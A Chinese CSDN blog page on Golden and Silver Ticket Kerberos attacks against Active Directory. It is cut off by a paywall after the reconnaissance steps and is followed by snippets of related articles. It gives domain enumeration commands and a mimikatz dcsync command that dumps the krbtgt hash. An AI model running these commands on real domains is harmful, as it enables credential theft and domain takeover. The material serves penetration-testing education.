黄金票据和白银票据

最新推荐文章于 2024-09-25 21:55:39 发布
置顶 最新推荐文章于 2024-09-25 21:55:39 发布
阅读量2.7k 收藏 6
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45682070/article/details/106604280
版权
本文深入探讨了Golden Ticket和Silver Ticket两种域控攻击技术。Golden Ticket允许攻击者在获取域控管理权限后,通过清除和利用krbtgt用户的hash进行票据传递。而Silver Ticket则涉及伪造TGS,目标限定为特定服务器。同时,文章指出pass the hash方法在某些旧版Windows系统中可能无法实现票据伪造。
摘要由CSDN通过智能技术生成

Golden Ticket

当攻击者已经拿到域控的管理权限
klist 域成员主机上执行klist,即可查看缓存的票据
klist purge 清除票据
在域渗透过程如果发现域管理员的密码已经修改,可尝试利用krbtgt用户的历史hash来进行票据传递攻击,krbtgt用户的密码一般不会有人去修改
信息搜集

域名 net time /domain    ipconfig /all 
伪造管理员用户名 net group "domain admins"
krbtgt账号的哈希值  mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit
域的SID值(去掉最后的500)  wmic useraccount get name,sid
#导出krbtgt的ntlm hash
mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit

利用


                

                
                
        

        

    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  郭晓雷
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
网络安全之黄金票据白银票据

				
			

			

				

					zxcvbnmasdflzl的博客
				

				

					05-03
					
					1991
					
				

			

		

		

			
				
Kerberos认证#
在学习黄金白银票据前,首先先了解一下什么是Kerberos认证

			
		

	



                

            
              



	

		

			

				
					
白银票据黄金票据的区别

					
最新发布

				
			

			

				

					m0_57836225的博客
				

				

					10-11
					
					424
					
				

			

		

		

			
				
就如同我们坐高铁需要先在网上购票,这就相当于向服务端发起请求获取高铁票。购票后到达高铁站进行票检的过程,类似于从 AC a as 获取到 tgt 信息后发送给 TGS 进行验证。只有票检通过(TGS 验证完成),我们才能拿着票据找到乘务员得知自己的位置(找到服务器)。

			
		

	



              


  
              

                


	

		

			

				
					
黄金票据白银票据的区别及实例搭建

				
			

			

				

					m0_57836225的博客
				

				

					09-25
					
					733
					
				

			

		

		

			
				
Kerberos 是一种网络认证协议,用于在不安全的网络环境中对用户和服务进行身份验证。它使用对称密钥加密技术,确保通信的安全性。Kerberos 协议的核心是一个密钥分发中心(Key Distribution Center,KDC),它负责管理用户和服务的密钥,并为用户和服务之间的通信提供认证和授权。黄金票据白银票据是两种常见的攻击手段,它们都是利用 Kerberos 认证协议的漏洞来获取对目标系统的访问权限。黄金票据可以模拟域管理员的身份,攻击范围广,持久性强;

			
		

	





	

		

			

				
					
内网渗透——黄金票据白银票据

				
			

			

				

					来日可期的博客
				

				

					10-11
					
					3470
					
				

			

		

		

			
				
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问和控制所有域内资源。
白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的

			
		

	



		

			
		



	

		

			

				
					
黄金票据白银票据详解

				
			

			

				

					败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
				

				

					06-22
					
					5713
					
				

			

		

		

			
				
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,

			
		

	





	

		

			

				
					
「Active Directory Sec」白银票据黄金票据

				
			

			

				

					dr0op's blog
				

				

					07-12
					
					954
					
				

			

		

		

			
				
白银票据: 即伪造的TGS。当获取需要访问的目标服务器NTLM HASH后,就可以利用Mimikatz伪造TGS,直接去访问目标服务器。此过程不需要KDC的参与。但缺点是只能访问一个服务。黄金票据: 即伪造TGT。当攻击者拥有普通域账户,krbtgt ntlm hash ,域SID时,就可以伪造TGT。拥有黄金票据就拥有了域内所有的访问控制权限。
通过Kerberos的通信过程就可以看出,当攻击者获取krbtgt的HASH值时,就可以利用这个HASH去伪造TGT,票据授予票据,在以后每一次的通信过程中,Cl

			
		

	





	

		

			

				
					
内网中黄金票据白银票据的区别

				
			

			

				

					05-14
				

			

		

		

			
				
在内网中,黄金票据白银票据通常是指两种不同的身份验证方式。  黄金票据是指一个用于身份验证的加密令牌,它被称为黄金是因为它具有最高的权限级别。黄金票据可以让用户在网络中获得管理员级别的访问权限,因此它...

			
		

	





	

		

			

				
					
内网渗透中黄金票据白银票据的区别

				
			

			

				

					03-31
				

			

		

		

			
				
黄金票据白银票据是内网渗透中常见的两种攻击手段,它们的主要区别在于:  1. 黄金票据通常是使用被攻破的域控制器的管理员账户来获取的,因此具有更高的权限,可以访问域中的所有资源和计算机。而白银票据则是...

			
		

	





	

		

			

				
					
【内网安全】黄金票据白银票据

				
			

			

				

					过期的秋刀鱼
				

				

					10-12
					
					1276
					
				

			

		

		

			
				
黄金票据就是伪造了Kerberos协议中的身份票据(TGT)黄金票据可以访问该用户身份的所有服务白银票据就是伪造了Kerberos协议通信流程中服务票据(SGT)白银票据只能访问某一个服务使用域管理员身份创建的票据就是黄金票据,可以访问域内的所有服务。黄金票据就是伪造了Kerberos协议中的身份票据(TGT)黄金票据可以访问该用户身份的所有服务白银票据就是伪造了Kerberos协议通信流程中服务票据(SGT)白银票据只能访问某一个服务使用域管理员身份创建的票据就是黄金票据,可以访问域内的所有服务。

			
		

	





	

		

			

				
					
域权限维持(黄金票据白银票据)

				
			

			

				

					qq_18811919的博客
				

				

					03-19
					
					2047
					
				

			

		

		

			
				
黄金票据白银票据通常被认为属于票据传递攻击(Pass-the-Ticket,简称PTT)的一种。
	这是一种针对Windows身份验证系统的攻击,攻击者可以利用缺陷或弱点获取用户或系统
	帐户的票据信息,然后将其用于进一步攻击或访问敏感资源本篇文章注意讲述了黄金票据白银票据的数据包分析以及如何进行PTT攻击,讲述了多种利用方式包括CS/mimikatz/Impacket等。	

			
		

	





	

		

			

				
					
Kerberos认证介绍及黄金票据白银票据

				
			

			

				

					qq_41814777的博客
				

				

					05-08
					
					1358
					
				

			

		

		

			
				
学前介绍
LM协议: 早期SMB协议在网络上传输明文口令。后来出现LAN Manager 挑战和
响应 验证机制简称LM,很简单,容易被破解
NTLM: 微软提出的一种windowsNT挑战/响应验证机制,称之为NTLM。现在已经
有了更新到了NTLMv2和kerberos验证机制
NTML的挑战和响应机制如下:(就跟短信验证码一样)
协商:客户端向服务端确认协议的版本
质询:客户端向服务端发送用户信息请求;服务器接收之后生成一个16位随机数,称之为Challenge;用NTML HASH加密16位随机数,

			
		

	





	

		

			

				
					
最浅显易懂kerberos认证和黄金白银票据

				
			

			

				

					
				

				

					04-22
					
					857
					
				

			

		

		

			
				
一、kerberos认证
一、
1.客户端账号用自己的密码哈希加密(时间戳、客户端、服务端等信息)发送给AS (身份验证服务)
AS 收到后进行查找,确认有该账号后生成随机密钥1
2.发送回客户端两个东西:
用客户端账号对应的密码哈希加密的(随机密钥1)和TGT(黄金票据):用特定账户哈希加密的(随机密钥1和时间戳等信息)
二、
客户端收到后用自己的密码哈希解密得到随机密钥1,然后用随机密钥1加密(时间戳等信息)–—信息1
与TGT一同发给TGS(票据授权服务)
三、
1.TGS收到后用特定账户哈希解密得到

			
		

	





	

		

			

				
					
内网安全:Kerberos域认证流程---黄金票据白银票据

				
			

			

				

					god_Zeo的安全博客
				

				

					05-12
					
					4350
					
				

			

		

		

			
				
文章目录0x00 前提0x01 Kerberos域认证域认证大致流程:第一部分:生成TGT 和  session key第二步:获取要访问的 server ticket第三部 向客户端向服务器请求认证0x01 白银票据(Silver Tickets)伪造白银票据(Silver Tickets)0x02 黄金票据(Golden Ticket)伪造黄金票据0x03 黄金票据白银票据比较0x04 参考
0x00 前提
算是学习之后总结记录,加深自己的理解,这里我是参考了倾旋师傅的讲解,感觉讲的比较好,加入自己的

			
		

	





	

		

			

				
					
【权限维持】黄金白银票据&隐藏账户&C2远控&RustDesk&GotoHTTP

				
			

			

				

					今天是几号的博客
				

				

					04-10
					
					1053
					
				

			

		

		

			
				
第⼀次拿到域管权限之后,需要将krbtgt NTLM hash进⾏保存,当第⼆次再来进⾏域渗透攻击时,我们就可使⽤krbtgt的NTLM hash制作⻩⾦票据,从⽽再次获得域管权限。工具原理:添加用户时在用户名上添加$符号,将该用户的用户组设置为空(单主机环境为空,域环境为administrator组),导致无法删除(在注册表中也可以进行隐藏)2、域的SID值:S-1-5-21-1218902331-2157346161-1782232778。sid:域环境下的SID,除去最后-的部分剩下的内容。

			
		

	





	

		

			

				
					
golden ticket和sliver ticket的区别是什么?

				
			

			

				

					Ping_Pig的博客
				

				

					11-09
					
					1307
					
				

			

		

		

			
				
讲在前面:

笔者本文对Kerberos协议不会进行详细分析,站在读者已有Kerberos协议简单的基础上结合互联网已有的文章,对上述两个漏洞产生的原理、利用方式、防御方式进行介绍。

区别之处:

笔者翻阅了国内外尽可能多的关于黄金票据白银票据的文章,将其中对于两者的区别之处的解释经过笔者删改后呈现如下,也就是说如下的区别,的的确确是全面的关于两者的区别。


			区别点
			
			
			黄金票据
			
			
			白银票据
			
		
			访问权限
			
			
			获取任何Ker

			
		

	





	

		

			

				
					
内网渗透之黄金白银票据Kerberos认证)简介

				
			

			

				

					weixin_53958661的博客
				

				

					12-28
					
					1395
					
				

			

		

		

			
				
图解:



Kerberos认证一共分为三个阶段:

Kerberos认证一共分为三个阶段
 AS-REQ---AS-REP阶段:(Client和AS的认证)
  1.首先Client(客户端)用自己的哈希值(NTLM-hash)对(时间戳,客,服)等数据加密后,发送给AS(身份验证服务)向AS请求TGT票据。 -----AS-REQ----
  2.当AS收到Client发来的数据后,AS会向AD(域控)发起请求,询问是否有该client用户,如果有的话就取出client的...

			
		

	





	

		

			

				
					
域内渗透

				
			

			

				

					include_heqile的博客
				

				

					02-22
					
					2507
					
				

			

		

		

			
				
文章目录文件查找使用`for`循环查找文件域相关知识域控制器需要开启的端口`NTDS.DIT`LDAP关于LDAP的一些重要的基本概念本地认证流程:ADSI编辑器RootDSE组策略域内信息搜集查看我们所攻占的主机是否是在域中借助系统命令搜取域成员计算机相关信息使用bat脚本从域控制器获取当前域中所有计算机IP并测试连通性查看无线网络连接信息网络代理信息WPADIIS 相关Windows2003查...

			
		

	





	

		

			

				
					
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

				
			

			

				

					墨痕诉清风的博客
				

				

					03-27
					
					7566
					
				

			

		

		

			
				
我在实验室环境中在服务器2019上使用了最新的mimikatz 2.2版本(12/25)。我收到以下错误“error kuhl_m_sekurlsa_acquireLSA;关键进口” 我尝试了早期版本2.1.1 #17763,并运行sekurlsa::logonpasswords就可以了。使用mimikatz的2.2.1版本即可避免此告警。原作者第一发现报错git描述。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值